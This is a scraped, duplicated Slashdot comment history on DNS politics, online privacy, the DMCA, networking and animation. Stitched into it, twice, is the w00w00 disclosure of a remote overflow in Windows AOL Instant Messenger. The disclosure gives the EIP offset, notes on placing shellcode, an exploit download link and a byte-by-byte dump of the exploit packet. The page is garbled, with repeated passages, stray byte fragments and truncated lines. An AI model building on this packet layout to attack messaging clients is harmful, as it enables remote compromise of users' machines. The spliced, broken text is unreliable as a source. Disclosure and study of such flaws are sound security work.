Firstly and foremost because it's a U.S. entity who pretends to be an international entity and the Internet quit being a U.S. entity a long time ago.
I suspect that China will be the first to set up its own root DNS servers and start issuing non-ICANN-approved domain names, probably in competition with ICANN and Versign. Other's will soon follow. Soon every big ISP both in the U.S. will see the need to have its own root DNS server. Of course there will be some cooperation required between the different DNS roots if their customers are going to be happy. Hopefully, this new cooperation will end the monopoly ICANN has over the administration of the Internet, leaving unsportsman like players like Versign standing out in left field, wondering why nobody is tossing them the ball anymore.
If I couldn't feel pain...
on
Pain-free mice
·
· Score: 4, Funny
Then my weekly trips to Madame Zora's house of punishment would be a complete waste of time and money. I *like* my pain, dammit!
Despite having the occasionally crappy product, I've always experienced a high level of customer service from them...
A little bit ago, my CD burner died. Not only did they RMA it, (and paid my shipping...) They sent me personal email when a new firmware revision came out for the drive later.
All of these people/companies/whatever have some of your sensitive personal information
I have reasonable and fairly easy legal alternativie when dealing with companies who divulge my personal information. If a company start distributing my personal information, such as a phone number or mailing address, then any companies who try to make use of that address are required by law to delete my entries if I contact them. If a telephone solicitor calls me and I demand they take me off their call list... they *have* to delete me, or risk civil or criminal consequences.
The same is simply not true for non-brick and mortar businesses, and there is nothing stopping them from trading and/or selling databases for 'data-mining' purposes: Ie: Company 'A' has a database saying that you bought subscriptions to porn websites, and billed it to a credit card. Then Company 'B' has a record of your name, credit card, and the billing address, which is a P.O. box. Company 'C' has a Database with your name, phone number, and real address. A simple SQL join on those two databases allows Company 'D' to start telemarketing explicit telephone chat service to your phone number and sending pornographic junk-mail ads to your home mail box, causing your parents/wife/gay boyfriend to start wondering what the hell is going on. Heaven forbid that your job depended on being 'morally upstanding', (such as a school teacher, etc...) and the knowledge that you get porn ads at your home started to get around.
This is an extreme example, but it shows how insidious this stuff really can be. Now this same example can be applied to brick and mortar businesses, but I don't like giving information to them, either, just for this reason.
Personalization won't work until Spam is dead...
on
Making It Personal
·
· Score: 5, Insightful
I very firmly beleive this.
I *want* sites to remember who I am and tailor their content to suit my needs and want, but for every company who goes under and sells a database to a data-mining company or a spamco, I grow a little more uncomfortable. I just don't feel comfortable giving information that personally identifies me and allows them to track me when I know that the only thing that stands between that information and the wolves is that given dot-com's bottom line.
Let's be honest here... Who expected any of the dot-coms to fail? Even VA-Linux is in chapter 11, aren't they? If they do go under, won't Slashdot's entire database full of opinions, email addresses, etc, be up for grab at the asset auction? I hope this never happens, but it's a possibility.
Until spamming is a thing of the past and data-mining is illegal or so uncommon that nobody does it any more, then personalization just won't work in a big way.
The thing is that this will happen in only 1 or 2 cities before these 'dark fiber' networks will 'become' the internet by default.
Let's put it this way. Let's say your business lives in a large city that has a ubiquitous network like this. All your customers have cheap routers, and most of them are in the city. Will you pay an ISP for connectivity to these customers if you didn't need any more?
If you're an network or communications intensive business such, where are you going to movie your business after hearing about this?
If City 'A' is doing it, and getting business, how long will it be before City 'B' picks up the slack to try to keep businesses from leaving?
It's a bit of a watershed, like electrical wiring and phone wiring was in the early part of the 20th century. It's not going to happen overnight, but once it does, you can bet that it will become a civics project in *every* city in just a few years, and will start interconnecting.
I see this as the way the net is going to go. It's too much like the road and highway system rather than the electrical system or TV delivery system like cable or DSS
People go 'to and fro' on the internet and don't necessarily turn to one provider for the majority of the service like they do for other utilities. Sure you can use pay-routes to get online, (ISP's) just as you can use toll-roads and turnpikes. The most-used routes to get online will probably be supported via tax dollars in the near to medium future.
This has up and down sides. The up side is that public ownership of the internet will mean that it will be subject to more stringent quality controls and pricing regulation. The down-side is that any public resource is inevitably over-used and abused. It will also be more subject to content regulation if it's truly perceived as a 'community' resource.
38 Whiny karma-whores, who post frequently and then complain when their 'me too' style posts are modded down.
493 Moderators who never follow the guidelines, even if they've ever bothered to read them.
roughly 400,000 Trolls, flamers, evangelsits, ASCII artists, Katz-bashers, goat-sex linkers, Taco-haters, Microsoft-5uXX0r's and other assorted losers.
Instructions:
Combine listed ingredients in any given environment, heating with a steady stream of press releases from Apple, Microsoft, VA-Linux, the EFF, or the RIAA/MPAA. You can cull these press releases directly from CNet, Wired, Salon, ZDNet, or CNN if you don't have any. Once brought to a roiling boil, let bake under its own heat for as long as you can stand.
Serve chilled, with white wine and flava beans. Serves 2
The 'blank media' tax has been touted in every country it's been implimented in as a way to pay publishers and artists for the perceived costs of media copying, be it fair use or piracy.
In the U.S., the media companies get a large piece of that fee.
That they want the right to collect both this fee *and* impliment copy controls is what is being questioned here.
Personally, I think it should boil down to one or the other. Pay the tax or pay for copy protected CD's. Not that either is really effective, but...
Hopefully, Boucher will raise a large enough stink over this that it will actually cause some changes. Not likely, but there's always hope...
I can't wait to see some secret cables being dug and laid by freedom-loving people.
Contractor: Hey, boss. I hit some sort of electrical cable at two feet.
Foreman: Was it flagged?
Contractor: Uhhh... no. All the flags for telco, electric and cable are over there. *Points*
Foreman: Keep digging.
Seriously, if this sort of thing could even take off, it will be via wireless connections.
Re:are you sure that's lindows?
on
LindowsOS Marches On
·
· Score: 4, Insightful
looks to me like win2k + object desktop.
That, of course, is the ultimate goal.
If they can truly sell their product as a 'Windows replacement' rather than just a highly tweaked Linux distro, they'll be able to do some business in the Windows Desktop market.
Of course, there were some pretty glaring problems in the screen shots, such as the missing text on the IE buttons. This would be enough to upset people I've done tech support for:
"But it's supposed to say 'Mail'! Why does it say 'Mai'?!"
But, all in all, I've yet to see so clean a Wine screenshot.
Good luck guys. You're starting with both feet in the gutter, especially with the lawsuit, but I think you might actually have a chance.
This boggles the mind. Of course I'm very happy that the banning of video games has been declared unconstitutional, but the Supreme Court has very typically put sex in a different category, saying that communities can ban sexual displays and businesses based on 'community standards'.
In my mind, it's not permissable to ban either, but I think it's more appropriate to filter violence than sex. A lot of people don't agree with me, but you'd think that if you can't ban one, then you shouldn't be able to ban the other.
Well, maybe with a name like Hugh Barrass, he's got a lot to prove. Hopefully, he's proved it well, since 'last mile' solutions are also often 'peer to peer' solutions. If you can run 10 megabit over bailing wire, what's to stop you from buying a cheapass router and joining the 'real' internet.
Next thing we'll have telephone answering machines recording what phone numbers people are calling from....video libraries recording who
borrowed each book and when.....Internet ads that track and record who saw them...hotel room doors that record every time each person goes in or out...cellphones that report every move we make to the authorities...tollbooths that record every car that goes through them... guards in every airport demanding to see 'our papers' before we are permitted to travel in our own country...
Hmmm... Caller ID machines, Doubleclick.net, and Electronic, DB controlled locks at hotels and Post 9-11 'random checks' at airports.
Gilmore's being sarcastic, isn't he?
Remember that the U.S. stoped being 'Of the people, for the people a long time ago'. It's been 'Of the corporate interest for the corporate intrest for quite a while... at least since the Vietnam War, (The Johnsons had a significant stake in Bell Helicopter, which profited outrageously from the war) and probably before, but I'm not a good enough history student to tell you how far back.
I know a 'Sherman Act' would sure as hell never make it out of committee in today's congress.
Well, when it gets too repressive, now I know where I can go. They speak Russian in the Ukraine, right?
Remember that OO code tends to compile into slower and larger executables than structured code. This is not always the case, and optimizing compiliers can do a great deal to mitigate this, but the fact of the matter is that OO code was developed to give coders more power and shorter development times.
Most of the engineering problems that I've ever seen solved in code are math intensive. One such problem was calculating the drag on a certain aircraft wing. If I remember correctly, the coder who was showing me her code indicated that the math involved broke down into a repetitious series of a few hundred cross-section integrations. These equations had to be solved for several hundred thousand cross sections to get a final result and a chart. At the time ('91) there was no 3d model, and the calculations were being conducted on a desktop computer. As you can imagine, it took a very.. very long time. One of the people I was with asked her what she was doing her math in.
C. C++ had too much overhead, she complained, and the C compiler she was using was slightly faster than Pascal or Fortran. She was very seriously considering trying to translate her equations to register-based assembler code to speed up the process.
If you have an engineering problem, and you're happy with the results you get from a funcational language, it's probably not worth your time you'll lose from switching to an OO language.
But the Water Still's least expensive cooler runs around $169. That model doesn't even have 'hot and cold' options. It'd be cheaper just to keep my bottled water in the refrigerator.
Seriously, I've often considered water cooling in my Athlon system, but every time I decide to go ahead and order it, the night before I place the order, I have a horrible nightmare about sparks and electrical fire leaping up out of my computer from where the water-line broke.
Why can't they make PC games like this? I mean- with 3d graphic movement and cartoon drawing styles? I guess the more relevant question is 'why won't they'...
Graphics overhead for the most part. The algotrithms for flat-shaded 3d rendering have been around for a while, but the most efficient algorithm I know of requires some complex math on a Z-buffer render and brightness render, requiring 3x overhead.
There are some quake 3 models out there that are designed to be flat-rendered, but again, put a *lot* of stress on the GPU you're rendering Quake with.
Now, that said, this *is* about to start showing up in video games. The last screenshots distributed for the new Zelda game indicated that it would be a very cartoony, almost anime-style flat-rendered game. Whether or not that will still be the case has yet to be seen.
"I think CGI is starting to phase out traditional animation," Swallow said. "But I think that is very much because of a generational divide. For a generation that is used to seeing these kind of digital images in video games, this is what they start to expect."
Hmmm... Apparently these guys are talking about Dizney and Dizney alone. The animation houses in Japan have done a great deal to convert over to digital CG production without sacrificing the look of traditional animation.
Take a good, close look at 'Love Hina', 'Excel Saga', or any newer anime and notice that the cels have all been 'painted' in Photoshop. On some of the closeup shots, you can make out typical Photoshop resizing residue and common filter effects.
CG may be killing the fatiguing process of 'pencil-paint-photograph', but not traditional animation.
Is an Anime-style cartoon from Sav! The World productions, which is french. (So anime-inspired that it's even got a JPop soundtrack) It's entirely CG, although it's flat-shaded so that it looks like traditional cel animation, albeit with spectacular eeffects and attention to detail. It looks neat, but will cost about $300,000 per episode to produce.
Author: Matt Conover (shok@dataforce.net)
Contributors: nocarrier, napster, and w00w00 collectively
PRELUDE
Happy w00year! It has been a while, friends, but w00w00 is still going
strong! w00w00 is over three years old now and still boasts the title
of the world's largest non-profit security team. One thing remains
true about the world of w00w00, though: we love to shake things up.
We'd like to take a moment and make an important point. Due to
unfortunate circumstances, the environment of the security industry
has changed for the worse. Most major vendors and security companies
have all switched their policies to limited disclosure, leaving the
end users still vulnerable to serious software flaws. Big corporate
monopolists: 1, end-users cornered into using second-rate software: 0.
Why? Two big reasons: the DMCA and using patriotism as an excuse to
avoid disclosing vulnerabilities.
First, the Digital Millenium Copyright Act affects circumvention of
anti-piracy mechanisms and reverse engineering. If a product is
released in binary form only (i.e., AOL) to protect its technologies
and one attempts to reverse engineer the file, it's a violation of
the DMCA. It's no question who the lobbyists behind this law were:
the big corporations. Not surprisingly, AOL Time Warner was one of
the DMCA's biggest supporters. Find out more information about the
DMCA at http://www.anti-dmca.org.
Second, Microsoft has "decried" information anarchy. Many major
security companies have followed suit and the rest just bent to the
pressure. However, blaming security research teams, such as w00w00,
for releasing information on vulnerabilities is a cop-out. Whether or
not security research teams release information on vulnerabilities, it
doesn't change the fact that the vendor produced insecure software.
Vulnerabilities are still exploited in the same way they were by the
Internet Worm 13 years ago. Further, one can reasonably assume that a
fair number of hackers are exploiting unpublished vulnerabilities.
By only silently updating products, computer users are unknowingly left
vulnerable.
DESCRIPTION
AOL Instant Messenger (AIM) has a major security vulnerability in the
latest stable (4.7.2480) and beta (4.8.2616) Windows versions. This
vulnerability will allow remote penetration of the victim's system
without any indication as to who performed the attack. There is no
opportunity to refuse the request. This does not affect the
non-Windows versions, because the non-Windows versions currently do
not yet support the feature that this vulnerability occurs in.
This particular vulnerability results from an overflow in the code
that parses a game request. The actual overflow appears to be in the
parsing of TLV type 0x2711. This may be more generic and exploitable
through other means, but AOL has not released enough information about
their protocol for us to be able to determine that. Robbie Saunder's
email yesterday should be enough of a hint which direction to look in.
We contacted the AOL Instant Messenger group but never received a
response. Normally we would be inclined to provide a fix, but it is
illegal to reverse engineer the AIM executable (DMCA and AIM's license
agreement to thank), so we are unable to provide a patch which will
modify it. Instead, we recommend Robbie Saunder's AIM Filter
(http://www.ssnbc.com/wiz/) to protect yourselves.
IMPLICATIONS
AOL Instant Messenger (http://www.aim.com) has over 100 million users.
We think that deserves repeating: 100 million users. Almost all of
these users are Windows users and directly vulnerable to this.
The first implication is that AOL should feel the weight of
responsibility and employ better software development practices. The
developers of a product with so many users should be much more
cautious and avoid overbloating with a multitude of features they
didn't have time to properly test in the first place.
Overall, though, the implications of this vulnerability are huge and
leave the door wide open for a worm not unlike those that Microsoft
(*cough* corporate monopoly *cough*) Outlook, IIS, et al. have all had
(Melissa, ILOVEYOU, CodeRed, nimda, etc.). An exploit could easily be
amended to download itself off the web, determine the buddies of the
victim, and then attack them also. Given the general nature of social
networks and how they are structured, we predict that it wouldn't take
long for such an attack to propagate.
To top everything off, the particular overflow described supra is
relatively simple to exploit. The payload can be several thousand bytes
long, which leaves lots of room for creative shellcode. In addition,
the shellcode can have null bytes in it, as long as the shellcode is
located after the offset to EIP in the shellcode. That is, the offset
to EIP is 1723 bytes into TLV type 0x2711. So if the shellcode is
located after offset 1726, null bytes can be left in.
EXPLOIT
The exploit, w00aimexp, is too big (1000+ lines) to include here, but
it can be downloaded at http://www.w00w00.org/files/w00aimexp.tgz. The
files can be viewed online at http://www.w00w00.org/files/w00aimexp/.
This is the exploit packet generated by w00aimexp (without
USE_FULL_SIZE defined):
SNAC header (10 bytes)
[\x00\x04] SNAC family (message)
[\x00\x06] SNAC type (outgoing message)
[\x00\x00] SNAC flags (none)
[\x00\x00\x00\x09] SNAC ID
[\xa4\x98\xa3\x56\x54\xbf\xf2\xfd] cookie
[\x00\x02] SNAC channel (data)
[\x0c] victim screen name length
[\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xX X] victim screen name
Now a set of TLV data types. There is a base container, type 0x05,
that contains everything else. Inside of this are several smaller
containers, with each TLV type following immediately after the
previous. If those are misaligned, you'll receive a "busted SNAC
payload" error.
[\x00\x05] TLV type (0x05)
[\x07\x62] TLV length (1890 bytes)
The guy spends most of his time bashing the DMCA and how hard it makes to offer patches to this sort of thing without AOL's permission:
From the NTBugtraq letter:
First, the Digital Millenium Copyright Act affects circumvention of anti-piracy mechanisms and reverse engineering. If a product is released in binary form only (i.e., AOL) to protect its technologies and one attempts to reverse engineer the file, it's a violation of the DMCA. It's no question who the lobbyists behind this law were: the big corporations. Not surprisingly, AOL Time Warner was one of the DMCA's biggest supporters. Find out more information about the DMCA at http://www.anti-dmca.org.
Remember that you're talking about marketing people here. They may be more dense at MS than elsewhere, but remember that these are the same guys who invented the practice of talking about and selling software project they can't and won't understand, let alone operate.
I work at a company where the marketing people are responisble for coming up with and selling software concepts to customers, yet are unable to unzip screenshots of the applications they're seelling or extract those screenshots from email attachments.
For those of you who don't know, the best way to get around Exchange's ability to track this sort of mail is a simple 'cut and paste' operation into a non-MS mail client.
I beleive that in most Exchange installations, you can also pop mail with any given non-MS pop client, Eudora, MozMail, Elm, Pine, or even Hotmail.
PS: I used to run Exchange -- so if you think I am not tracking this message, think again. Don't forward it! And if you have forward rules that have forwarded this message, then perhaps you should think again about forwarding internal email with those rules. I want to give you folks all the information I can in a very open way. If we continue to have bad apples or careless people out there, I will not be able to help you by sending this kind of information!
This reads a lot like 'Our Company is great and wonderful! Anyone who says different will be punished!'
Seriously, with this kind of mentality, its a wonder that more emails of this nature are not leaked.
Slashdot Mirror
Firstly and foremost because it's a U.S. entity who pretends to be an international entity and the Internet quit being a U.S. entity a long time ago.
I suspect that China will be the first to set up its own root DNS servers and start issuing non-ICANN-approved domain names, probably in competition with ICANN and Versign. Other's will soon follow. Soon every big ISP both in the U.S. will see the need to have its own root DNS server. Of course there will be some cooperation required between the different DNS roots if their customers are going to be happy. Hopefully, this new cooperation will end the monopoly ICANN has over the administration of the Internet, leaving unsportsman like players like Versign standing out in left field, wondering why nobody is tossing them the ball anymore.
Then my weekly trips to Madame Zora's house of punishment would be a complete waste of time and money. I *like* my pain, dammit!
Despite having the occasionally crappy product, I've always experienced a high level of customer service from them...
A little bit ago, my CD burner died. Not only did they RMA it, (and paid my shipping...) They sent me personal email when a new firmware revision came out for the drive later.
Of course your milage may vary...
All of these people/companies/whatever have some of your sensitive personal information
I have reasonable and fairly easy legal alternativie when dealing with companies who divulge my personal information. If a company start distributing my personal information, such as a phone number or mailing address, then any companies who try to make use of that address are required by law to delete my entries if I contact them. If a telephone solicitor calls me and I demand they take me off their call list... they *have* to delete me, or risk civil or criminal consequences.
The same is simply not true for non-brick and mortar businesses, and there is nothing stopping them from trading and/or selling databases for 'data-mining' purposes: Ie: Company 'A' has a database saying that you bought subscriptions to porn websites, and billed it to a credit card. Then Company 'B' has a record of your name, credit card, and the billing address, which is a P.O. box. Company 'C' has a Database with your name, phone number, and real address. A simple SQL join on those two databases allows Company 'D' to start telemarketing explicit telephone chat service to your phone number and sending pornographic junk-mail ads to your home mail box, causing your parents/wife/gay boyfriend to start wondering what the hell is going on. Heaven forbid that your job depended on being 'morally upstanding', (such as a school teacher, etc...) and the knowledge that you get porn ads at your home started to get around.
This is an extreme example, but it shows how insidious this stuff really can be. Now this same example can be applied to brick and mortar businesses, but I don't like giving information to them, either, just for this reason.
I very firmly beleive this.
I *want* sites to remember who I am and tailor their content to suit my needs and want, but for every company who goes under and sells a database to a data-mining company or a spamco, I grow a little more uncomfortable. I just don't feel comfortable giving information that personally identifies me and allows them to track me when I know that the only thing that stands between that information and the wolves is that given dot-com's bottom line.
Let's be honest here... Who expected any of the dot-coms to fail? Even VA-Linux is in chapter 11, aren't they? If they do go under, won't Slashdot's entire database full of opinions, email addresses, etc, be up for grab at the asset auction? I hope this never happens, but it's a possibility.
Until spamming is a thing of the past and data-mining is illegal or so uncommon that nobody does it any more, then personalization just won't work in a big way.
The thing is that this will happen in only 1 or 2 cities before these 'dark fiber' networks will 'become' the internet by default.
Let's put it this way. Let's say your business lives in a large city that has a ubiquitous network like this. All your customers have cheap routers, and most of them are in the city. Will you pay an ISP for connectivity to these customers if you didn't need any more?
If you're an network or communications intensive business such, where are you going to movie your business after hearing about this?
If City 'A' is doing it, and getting business, how long will it be before City 'B' picks up the slack to try to keep businesses from leaving?
It's a bit of a watershed, like electrical wiring and phone wiring was in the early part of the 20th century. It's not going to happen overnight, but once it does, you can bet that it will become a civics project in *every* city in just a few years, and will start interconnecting.
I see this as the way the net is going to go. It's too much like the road and highway system rather than the electrical system or TV delivery system like cable or DSS
People go 'to and fro' on the internet and don't necessarily turn to one provider for the majority of the service like they do for other utilities. Sure you can use pay-routes to get online, (ISP's) just as you can use toll-roads and turnpikes. The most-used routes to get online will probably be supported via tax dollars in the near to medium future.
This has up and down sides. The up side is that public ownership of the internet will mean that it will be subject to more stringent quality controls and pricing regulation. The down-side is that any public resource is inevitably over-used and abused. It will also be more subject to content regulation if it's truly perceived as a 'community' resource.
Ingredients
1 Cluster of Linux Webservers
1 Instance of Slashcode
1 DB of your choice
3 Intelligent Posters
38 Whiny karma-whores, who post frequently and then complain when their 'me too' style posts are modded down.
493 Moderators who never follow the guidelines, even if they've ever bothered to read them.
roughly 400,000 Trolls, flamers, evangelsits, ASCII artists, Katz-bashers, goat-sex linkers, Taco-haters, Microsoft-5uXX0r's and other assorted losers.
Instructions:
Combine listed ingredients in any given environment, heating with a steady stream of press releases from Apple, Microsoft, VA-Linux, the EFF, or the RIAA/MPAA. You can cull these press releases directly from CNet, Wired, Salon, ZDNet, or CNN if you don't have any. Once brought to a roiling boil, let bake under its own heat for as long as you can stand.
Serve chilled, with white wine and flava beans. Serves 2
There are gigs and gigs of both pirate and legitimate divx3 and 4 videos out there to be had on IRC, Usenet, FT, and Gnutella.
The only ones who use WMV are corporate entities who don't have anything good to encode anyway...
*sigh*
The 'blank media' tax has been touted in every country it's been implimented in as a way to pay publishers and artists for the perceived costs of media copying, be it fair use or piracy.
In the U.S., the media companies get a large piece of that fee.
That they want the right to collect both this fee *and* impliment copy controls is what is being questioned here.
Personally, I think it should boil down to one or the other. Pay the tax or pay for copy protected CD's. Not that either is really effective, but...
Hopefully, Boucher will raise a large enough stink over this that it will actually cause some changes. Not likely, but there's always hope...
I can't wait to see some secret cables being dug and laid by freedom-loving people.
Contractor: Hey, boss. I hit some sort of electrical cable at two feet.
Foreman: Was it flagged?
Contractor: Uhhh... no. All the flags for telco, electric and cable are over there. *Points*
Foreman: Keep digging.
Seriously, if this sort of thing could even take off, it will be via wireless connections.
looks to me like win2k + object desktop.
That, of course, is the ultimate goal.
If they can truly sell their product as a 'Windows replacement' rather than just a highly tweaked Linux distro, they'll be able to do some business in the Windows Desktop market.
Of course, there were some pretty glaring problems in the screen shots, such as the missing text on the IE buttons. This would be enough to upset people I've done tech support for:
"But it's supposed to say 'Mail'! Why does it say 'Mai'?!"
But, all in all, I've yet to see so clean a Wine screenshot.
Good luck guys. You're starting with both feet in the gutter, especially with the lawsuit, but I think you might actually have a chance.
This boggles the mind. Of course I'm very happy that the banning of video games has been declared unconstitutional, but the Supreme Court has very typically put sex in a different category, saying that communities can ban sexual displays and businesses based on 'community standards'.
In my mind, it's not permissable to ban either, but I think it's more appropriate to filter violence than sex. A lot of people don't agree with me, but you'd think that if you can't ban one, then you shouldn't be able to ban the other.
Well, maybe with a name like Hugh Barrass, he's got a lot to prove. Hopefully, he's proved it well, since 'last mile' solutions are also often 'peer to peer' solutions. If you can run 10 megabit over bailing wire, what's to stop you from buying a cheapass router and joining the 'real' internet.
Sayeth Gilmore...
Next thing we'll have telephone answering machines recording what phone numbers people are calling from....video libraries recording who
borrowed each book and when.....Internet ads that track and record who saw them...hotel room doors that record every time each person goes in or out...cellphones that report every move we make to the authorities...tollbooths that record every car that goes through them... guards in every airport demanding to see 'our papers' before we are permitted to travel in our own country...
Hmmm... Caller ID machines, Doubleclick.net, and Electronic, DB controlled locks at hotels and Post 9-11 'random checks' at airports.
Gilmore's being sarcastic, isn't he?
Remember that the U.S. stoped being 'Of the people, for the people a long time ago'. It's been 'Of the corporate interest for the corporate intrest for quite a while... at least since the Vietnam War, (The Johnsons had a significant stake in Bell Helicopter, which profited outrageously from the war) and probably before, but I'm not a good enough history student to tell you how far back.
I know a 'Sherman Act' would sure as hell never make it out of committee in today's congress.
Well, when it gets too repressive, now I know where I can go. They speak Russian in the Ukraine, right?
Remember that OO code tends to compile into slower and larger executables than structured code. This is not always the case, and optimizing compiliers can do a great deal to mitigate this, but the fact of the matter is that OO code was developed to give coders more power and shorter development times.
Most of the engineering problems that I've ever seen solved in code are math intensive. One such problem was calculating the drag on a certain aircraft wing. If I remember correctly, the coder who was showing me her code indicated that the math involved broke down into a repetitious series of a few hundred cross-section integrations. These equations had to be solved for several hundred thousand cross sections to get a final result and a chart. At the time ('91) there was no 3d model, and the calculations were being conducted on a desktop computer. As you can imagine, it took a very.. very long time. One of the people I was with asked her what she was doing her math in.
C. C++ had too much overhead, she complained, and the C compiler she was using was slightly faster than Pascal or Fortran. She was very seriously considering trying to translate her equations to register-based assembler code to speed up the process.
If you have an engineering problem, and you're happy with the results you get from a funcational language, it's probably not worth your time you'll lose from switching to an OO language.
If you
But the Water Still's least expensive cooler runs around $169. That model doesn't even have 'hot and cold' options. It'd be cheaper just to keep my bottled water in the refrigerator.
Seriously, I've often considered water cooling in my Athlon system, but every time I decide to go ahead and order it, the night before I place the order, I have a horrible nightmare about sparks and electrical fire leaping up out of my computer from where the water-line broke.
Why can't they make PC games like this? I mean- with 3d graphic movement and cartoon drawing styles? I guess the more relevant question is 'why won't they'...
Graphics overhead for the most part. The algotrithms for flat-shaded 3d rendering have been around for a while, but the most efficient algorithm I know of requires some complex math on a Z-buffer render and brightness render, requiring 3x overhead.
There are some quake 3 models out there that are designed to be flat-rendered, but again, put a *lot* of stress on the GPU you're rendering Quake with.
Now, that said, this *is* about to start showing up in video games. The last screenshots distributed for the new Zelda game indicated that it would be a very cartoony, almost anime-style flat-rendered game. Whether or not that will still be the case has yet to be seen.
"I think CGI is starting to phase out traditional animation," Swallow said. "But I think that is very much because of a generational divide. For a generation that is used to seeing these kind of digital images in video games, this is what they start to expect."
Hmmm... Apparently these guys are talking about Dizney and Dizney alone. The animation houses in Japan have done a great deal to convert over to digital CG production without sacrificing the look of traditional animation.
Take a good, close look at 'Love Hina', 'Excel Saga', or any newer anime and notice that the cels have all been 'painted' in Photoshop. On some of the closeup shots, you can make out typical Photoshop resizing residue and common filter effects.
CG may be killing the fatiguing process of 'pencil-paint-photograph', but not traditional animation.
Is an Anime-style cartoon from Sav! The World productions, which is french. (So anime-inspired that it's even got a JPop soundtrack) It's entirely CG, although it's flat-shaded so that it looks like traditional cel animation, albeit with spectacular eeffects and attention to detail. It looks neat, but will cost about $300,000 per episode to produce.
You can see an Mpeg format trailer here:
http://www.savtheworld.com/
AOL Instant Messenger advisory
X X] victim screen name
4 5\ x53\x54\x00\x00]
r =t rue&url=http://www.w00w00.org"]
2 2\ x44\x45\x53
w00w00! http://www.w00w00.org
Author: Matt Conover (shok@dataforce.net)
Contributors: nocarrier, napster, and w00w00 collectively
PRELUDE
Happy w00year! It has been a while, friends, but w00w00 is still going
strong! w00w00 is over three years old now and still boasts the title
of the world's largest non-profit security team. One thing remains
true about the world of w00w00, though: we love to shake things up.
We'd like to take a moment and make an important point. Due to
unfortunate circumstances, the environment of the security industry
has changed for the worse. Most major vendors and security companies
have all switched their policies to limited disclosure, leaving the
end users still vulnerable to serious software flaws. Big corporate
monopolists: 1, end-users cornered into using second-rate software: 0.
Why? Two big reasons: the DMCA and using patriotism as an excuse to
avoid disclosing vulnerabilities.
First, the Digital Millenium Copyright Act affects circumvention of
anti-piracy mechanisms and reverse engineering. If a product is
released in binary form only (i.e., AOL) to protect its technologies
and one attempts to reverse engineer the file, it's a violation of
the DMCA. It's no question who the lobbyists behind this law were:
the big corporations. Not surprisingly, AOL Time Warner was one of
the DMCA's biggest supporters. Find out more information about the
DMCA at http://www.anti-dmca.org.
Second, Microsoft has "decried" information anarchy. Many major
security companies have followed suit and the rest just bent to the
pressure. However, blaming security research teams, such as w00w00,
for releasing information on vulnerabilities is a cop-out. Whether or
not security research teams release information on vulnerabilities, it
doesn't change the fact that the vendor produced insecure software.
Vulnerabilities are still exploited in the same way they were by the
Internet Worm 13 years ago. Further, one can reasonably assume that a
fair number of hackers are exploiting unpublished vulnerabilities.
By only silently updating products, computer users are unknowingly left
vulnerable.
DESCRIPTION
AOL Instant Messenger (AIM) has a major security vulnerability in the
latest stable (4.7.2480) and beta (4.8.2616) Windows versions. This
vulnerability will allow remote penetration of the victim's system
without any indication as to who performed the attack. There is no
opportunity to refuse the request. This does not affect the
non-Windows versions, because the non-Windows versions currently do
not yet support the feature that this vulnerability occurs in.
This particular vulnerability results from an overflow in the code
that parses a game request. The actual overflow appears to be in the
parsing of TLV type 0x2711. This may be more generic and exploitable
through other means, but AOL has not released enough information about
their protocol for us to be able to determine that. Robbie Saunder's
email yesterday should be enough of a hint which direction to look in.
We contacted the AOL Instant Messenger group but never received a
response. Normally we would be inclined to provide a fix, but it is
illegal to reverse engineer the AIM executable (DMCA and AIM's license
agreement to thank), so we are unable to provide a patch which will
modify it. Instead, we recommend Robbie Saunder's AIM Filter
(http://www.ssnbc.com/wiz/) to protect yourselves.
IMPLICATIONS
AOL Instant Messenger (http://www.aim.com) has over 100 million users.
We think that deserves repeating: 100 million users. Almost all of
these users are Windows users and directly vulnerable to this.
The first implication is that AOL should feel the weight of
responsibility and employ better software development practices. The
developers of a product with so many users should be much more
cautious and avoid overbloating with a multitude of features they
didn't have time to properly test in the first place.
Overall, though, the implications of this vulnerability are huge and
leave the door wide open for a worm not unlike those that Microsoft
(*cough* corporate monopoly *cough*) Outlook, IIS, et al. have all had
(Melissa, ILOVEYOU, CodeRed, nimda, etc.). An exploit could easily be
amended to download itself off the web, determine the buddies of the
victim, and then attack them also. Given the general nature of social
networks and how they are structured, we predict that it wouldn't take
long for such an attack to propagate.
To top everything off, the particular overflow described supra is
relatively simple to exploit. The payload can be several thousand bytes
long, which leaves lots of room for creative shellcode. In addition,
the shellcode can have null bytes in it, as long as the shellcode is
located after the offset to EIP in the shellcode. That is, the offset
to EIP is 1723 bytes into TLV type 0x2711. So if the shellcode is
located after offset 1726, null bytes can be left in.
EXPLOIT
The exploit, w00aimexp, is too big (1000+ lines) to include here, but
it can be downloaded at http://www.w00w00.org/files/w00aimexp.tgz. The
files can be viewed online at http://www.w00w00.org/files/w00aimexp/.
This is the exploit packet generated by w00aimexp (without
USE_FULL_SIZE defined):
FLAP header (6 bytes)
[\x2a] '*' (magic number)
[\x02] channel (data)
[\x00\x11] seqnum number
[\x07\x87] packet length (1927 bytes)
SNAC header (10 bytes)
[\x00\x04] SNAC family (message)
[\x00\x06] SNAC type (outgoing message)
[\x00\x00] SNAC flags (none)
[\x00\x00\x00\x09] SNAC ID
[\xa4\x98\xa3\x56\x54\xbf\xf2\xfd] cookie
[\x00\x02] SNAC channel (data)
[\x0c] victim screen name length
[\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\xXX\x
Now a set of TLV data types. There is a base container, type 0x05,
that contains everything else. Inside of this are several smaller
containers, with each TLV type following immediately after the
previous. If those are misaligned, you'll receive a "busted SNAC
payload" error.
[\x00\x05] TLV type (0x05)
[\x07\x62] TLV length (1890 bytes)
[\x00\x00] cookie marker
[\xa4\x98\xa3\x56\x54\xbf\xf2\xfd] cookie
Capability used to exploit this libfaim calls it (SAVESTOCKS):
[\x09\x46\x13\x47\x4c\x7f\x11\xd1\x82\x22\x44\x
[\x00\x0a] TLV type (0x0a)
[\x00\x02] TLV length (2 bytes)
[\x00\x01] TLV data
[\x00\x0f] TLV type (0x0f)
[\x00\x00] TLV length (0)
[\x00\x0e] TLV type (0x0e)
[\x00\x02] TLV length (2 bytes)
["en"] TLV data (language)
[\x00\x0d] TLV type (0x0d)
[\x00\x08] TLV length (8 bytes)
["us-ascii"] TLV data (charset)
[\x00\x0c] TLV type (0x0d)
[\x00\x06] TLV length (6 bytes)
["w00w00"] TLV data (game's name?)
[\x00\x03] TLV type (0x03)
[\x00\x04] TLV length (4 bytes)
[\x40\xa3\x1e\x4f]
[\x00\x05] TLV type (0x05)
[\x00\x02] TLV length (2 byte)
[\x14\x46]
